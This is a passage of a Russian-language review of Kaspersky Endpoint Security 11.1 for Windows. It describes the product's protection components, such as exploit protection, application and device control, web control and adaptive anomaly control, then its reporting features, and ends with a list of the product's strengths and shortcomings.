данных;сетевые правила программ — используются для ограничения сетевой активности заданной программы. Это позволяет настраивать фильтрацию сетевой активности, например, когда определенный тип сетевых соединений запрещен для одних программ, но разрешен для других.Продвинутая защитаАнализ поведения программНазначение компонента «Анализ поведения программ» заключается в получении данных о действиях программ на компьютере и предоставлении этой информации другим компонентам защиты.При этом используются шаблоны опасного поведения программ, которые состоят из последовательностей действий, классифицируемых программой как опасные. В том случае если активность программы совпадает с одним из шаблонов опасного поведения, Kaspersky Endpoint Security 11.1 выполняет выбранное ответное действие. Рисунок 12. Параметры настройки механизмов анализа поведения Kaspersky Endpoint Security 11.1 Для выбора необходимой реакции на обнаружение вредоносной активности достаточно в левой части окна в разделе «Продвинутая защита» выбрать подраздел «Анализ поведения», и после того, как в правой части окна отобразятся параметры компонента, в раскрывающемся списке задать нужное действие:удалять файл с созданием резервной копии файла в резервном хранилище;завершать работу вредоносной программы;информировать пользователя посредством добавления информации о вредоносной активности соответствующей программы в список активных угроз. Защита от эксплойтовKaspersky Endpoint Security 11.1 позволяет отслеживать исполняемые файлы, запускаемые уязвимыми программами. Если обнаруживается, что попытка запустить исполняемый файл из уязвимой программы не была инициирована пользователем, то Kaspersky Endpoint Security 11.1 блокирует запуск соответствующего файла.При этом в рамках настройки политики можно:выбрать действие при обнаружении эксплойта:блокировать операцию;информировать путем создания в журнале записи, содержащей информацию об эксплойте и добавления этой информации в список активных угроз;включить или выключить защиту памяти системных процессов, тем самым устанавливая или отменяя блокировку попыток доступа сторонних процессов к системным процессам. Рисунок 13. Параметры настройки механизмов защиты от эксплойтов, реализованных в Kaspersky Endpoint Security 11.1 Предотвращение вторженийКомпонент «Предотвращение вторжений» препятствует выполнению программами потенциально опасных для системы действий, а кроме того, контролирует доступ к ресурсам операционной системы и данным.Работа программ контролируется с помощью правил, которые представляют собой набор ограничений для различных действий программ в операционной системе и прав доступа к ресурсам компьютера. Рисунок 14. Параметры настройки механизмов предотвращения вторжений, реализованных в Kaspersky Endpoint Security 11.1 Во время первого запуска программы на компьютере она проверяется и помещается в одну из групп доверия, определяющую правила, которые Kaspersky Endpoint Security 11.1 применяет для контроля активности.Во время повторного запуска программы проверяется ее целостность. Если программа не была изменена, компонент применяет к ней текущие правила контроля активности программ. В противном случае к программе применяются процедуры исследования, как при первом запуске.В Kaspersky Endpoint Security 11.1 реализованы функции управления правами программ на операции над различными категориями ресурсов операционной системы и персональных данных. При этом предусмотрен ряд категорий защищаемых ресурсов по умолчанию, которые не могут быть изменены или удалены. Но можно:добавить новую категорию защищаемых ресурсов;добавить новый защищаемый ресурс;выключить защиту ресурса. Рисунок 15. Управление защищаемыми ресурсами в Kaspersky Endpoint Security 11.1 Откат вредоносных действийВо время отката действий вредоносной программы в операционной системе Kaspersky Endpoint Security 11.1 обрабатывает следующие типы активности вредоносной программы:файловая активность;системная активность;сетевая активность.Контроль безопасностиКонтроль программПопытки запуска программ пользователями отслеживаются и регулируются с помощью заданного набора правил. Запуск программ, параметры которых не удовлетворяют ни одному из правил «Контроля программ», регулируется выбранным режимом работы компонента «Контроль программ». По умолчанию выбран режим «Черный список», в рамках которого любым пользователям разрешается запускать любые программы, но все попытки запуска программ фиксируются в отчетах.При попытке пользователя запустить программу, запрещенную правилами, Kaspersky Endpoint Security 11.1 блокирует запуск этой программы (если выбрано действие «Блокировать») или сохраняет информацию о запуске программы в отчет (если выбрано действие «Уведомлять»).Если разрешающие правила контроля программ сформированы максимально полно, компонент запрещает запуск всех новых программ, не проверенных администратором локальной сети организации, но обеспечивает работоспособность операционной системы и проверенных программ, которые нужны пользователям для выполнения должностных обязанностей. Контроль устройствКонтроль устройств обеспечивает безопасность конфиденциальных данных путем ограничения доступа пользователей к устройствам, установленным или подключенным к компьютеру:устройствам памяти (жесткие диски, съемные диски, ленточные накопители, CD/DVD-приводы);инструментам передачи информации (модемы, внешние сетевые карты);инструментам превращения информации в твердую копию (принтеры);шинам подключения (далее также «шинам») — интерфейсам, с помощью которых устройства подключаются к компьютеру (например, USB, FireWire, Infrared).Контроль устройств регулирует доступ пользователей к устройствам с помощью правил доступа:к устройствам;к шинам подключения.В Kaspersky Endpoint Security 11.1 реализована концепция доверенных устройств. Под доверенными понимаются устройства, полный доступ к которым разрешен в любое время для пользователей, указанных в параметрах доверенного устройства. Веб-контрольВ Kaspersky Endpoint Security 11.1 обеспечивается возможность контроля за действиями пользователей локальной сети организации в части ограничения или запрета доступа к веб-ресурсам.Функция веб-контроля предоставляет следующие возможности:экономия трафика;разграничение доступа по категориям содержания веб-ресурсов;централизованного управления доступом к веб-ресурсам.Категории содержания веб-ресурсов подобраны таким образом, чтобы максимально полно описать блоки информации, размещенные на веб-ресурсах, с учетом их функциональных и тематических особенностей, при этом один веб-ресурс может относиться к нескольким категориям одновременно:для взрослых;программное обеспечение, аудио, видео;алкоголь, табак, наркотические и психотропные вещества;насилие;оружие, взрывчатые вещества, пиротехника;нецензурная лексика;общение в сети;азартные игры, лотереи, тотализаторы;интернет-магазины, банки, платежные системы;поиск работы;средства анонимного доступа;компьютерные игры;религии, религиозные объединения;новостные ресурсы;баннеры;региональные ограничения законодательства.По итогам 2018 года угрозой номер один была признана угроза запуска в корпоративной сети майнинговых программ. Функция веб-контроля Kaspersky Endpoint Security 11.1 реализует специальную технологию, которая выявляет и блокирует попытки запуска таких программ, а также пресекает попытки доступа к криптовалютным биржам. Адаптивный контроль аномалийКомпонент позволяет отслеживать и блокировать подозрительные действия, нехарактерные для защищаемого компьютера. Реализована возможность работы в одном из выбранных режимов:обучающий режим — информация о подозрительных действиях отправляется администратору, который может сформировать списки исключений;рабочий режим — компонент блокирует подозрительные действия, не добавленные в исключения на этапе обучения.Адаптивный контроль аномалий работает на основе сформированных правил. При обнаружении подозрительного действия, на которое распространяется правило, Kaspersky Endpoint Security 11.1 блокирует подозрительное действие, сохраняет данные в соответствующий отчет и оповещает администратора о нетипичной активности. Процесс полностью автоматизирован и не требует ручной настройки политик контроля программ. Это экономит время и позволяет избежать ложноположительных срабатываний.Легко догадаться, что с помощью данного механизма организация может противостоять атакам со стороны еще не исследованных типов вредоносных программ. Рисунок 16. Правила механизма адаптивного контроля аномалий в Kaspersky Endpoint Security 11.1Отчетность в Kaspersky Endpoint SecurityИнформация о работе каждого компонента Kaspersky Endpoint Security 11.1, о выполнении каждой задачи проверки, задачи обновления и задачи проверки целостности, а также о работе программы в целом сохраняется в отчетах.Отчеты хранятся в каталоге ProgramData\Kaspersky Lab\KES\Report. Данные в отчете представлены в виде таблицы, которая содержит список событий. Каждая строка таблицы содержит информацию об отдельном событии, атрибуты события находятся в графах таблицы. Реализована возможность сохранения отчетов в текстовый файл.Информация, содержащаяся в отчетах Kaspersky Endpoint Security 11.1, удобно структурирована и может быть полезна для получения сведений о работе системы. Но гораздо более мощный инструмент мониторинга реализован в Kaspersky Security Center. Он позволяет:быстро оценить текущее состояние управляемых устройств с помощью цветовых индикаторов;получить статистическую информацию о состоянии системы защиты и управляемых устройств в виде настраиваемых информационных панелей;подробную числовую информацию о безопасности сети организации;произвести выборки событий, сгрупированные по уровням важности («Критические события», «Отказ функционирования», «Предупреждения» и «Информационные сообщения»), по времени («Недавние события») и по типу («Пользовательские запросы» и «События аудита»).Настройка уведомлений в Kaspersky Endpoint SecurityKaspersky Endpoint Security 11.1 позволяет вносить информацию о событиях, возникающих в работе программы, в журнал событий Microsoft Windows, а также использовать для этих целей собственный журнал.Уведомления могут доставляться следующими способами:с помощью всплывающих уведомлений в области уведомлений панели задач Microsoft Windows;по электронной почте.В рамках работы с таблицей событий для настройки службы уведомлений, можно:фильтровать события службы уведомлений по значениям граф или по условиям сложного фильтра;использовать функцию поиска событий службы уведомлений;сортировать события службы уведомлений;изменять порядок и набор граф, отображаемых в списке событий службы уведомлений. Рисунок 17. Основные возможности по работе с отчетами в Kaspersky Endpoint Security 11.1 ВыводыСогласно прогнозам, к 2021 году системы защиты конечных точек будут предоставлять сервисы автоматизированного и координированного расследования инцидентов, а также реагирования на обнаруженные уязвимости. Отдельные коробочные решения по обнаружению и реагированию для конечных точек (Endpoint Detection and Response, EDR) будут нацелены на инфраструктуры провайдеров услуг по аутсорсингу информационной безопасности (Managed Security Service Provider, MSSP) и масштабных центров мониторинга информационной безопасности (Security Operations Center, SOC).В данном контексте интересно оценить общий потенциал решения «Лаборатории Касперского» с точки зрения готовности соответствовать требованиям времени.Kaspersky Endpoint Security 11.1 для Windows предназначен для обеспечения защиты от множества киберугроз и предоставления расширенных возможностей по управлению ИТ-средой организации.Достоинства:Обеспечение непрерывности бизнес-процессов за счет механизмов предотвращения вторжений, отката вредоносных действий, резервного копирования, автоматической установки исправлений, автоматизации рутинных процессов.Эффективная работа с продуктом за счет использования единой консоли управления с унифицированными политиками, в том числе ее веб-исполнения.Высокий уровень защиты за счет использования современных технологий, включая адаптивный контроль аномалий, статическое и динамическое машинное обучение, анализ поведения программ, защиту от эксплойтов, почтовых, файловых и веб-угроз, запрет майнинга на рабочих устройствах, контроль программ и устройств.Ряд компонентов продукта («Система предотвращения вторжений», облачная репутационная база данных Kaspersky Security Network, «Анализ поведения», «Защита от эксплойтов» и др.), могут функционировать без использования сигнатур и позволяют обнаруживать угрозы без частых обновлений.Собственный Whitelisting на основе постоянно обновляемой базы, где содержатся сведения о более чем 2,5 млрд доверенных программ. Эта база автоматически синхронизируется с конечными устройствами, что позволяет облегчить выполнение повседневных задач администрирования.Недостатки:Ограничения поддержки серверных платформ. Например, не поддерживаются конфигурации Server Core и Cluster Mode (для этих целей может использоваться специализированный продукт Kaspersky Security 10.x для Windows Server), шифрование диска Kaspersky (FDE) и шифрование файлов.Ограничения, связанные с процедурами развертывания продукта. Например, после установки на зараженный компьютер Kaspersky Endpoint Security 11.1 не предупреждает пользователя о необходимости запустить проверку компьютера.Ограничения, связанные с поддержкой форматов и протоколов, применительно к отдельным компонентам. Например, компонент «Веб-контроль» не поддерживает протокол RTPM.Стоит заметить, что указанные ограничения продукта не носят системный характер, а скорее, представляют собой недоработки сегодняшнего дня.Подчеркнем, что ряд рассмотренных в настоящем обзоре возможностей был реализован именно в Kaspersky Endpoint Security для Windows версии 11.1, и не был доступен в предыдущих версиях. Полагая, что для многих пользователей продукта со стажем была бы удобна форма подачи материала, при которой освещаются исключительно нововведения 11.1 версии, планируем в ближайшее время подготовить обзор нововведений.
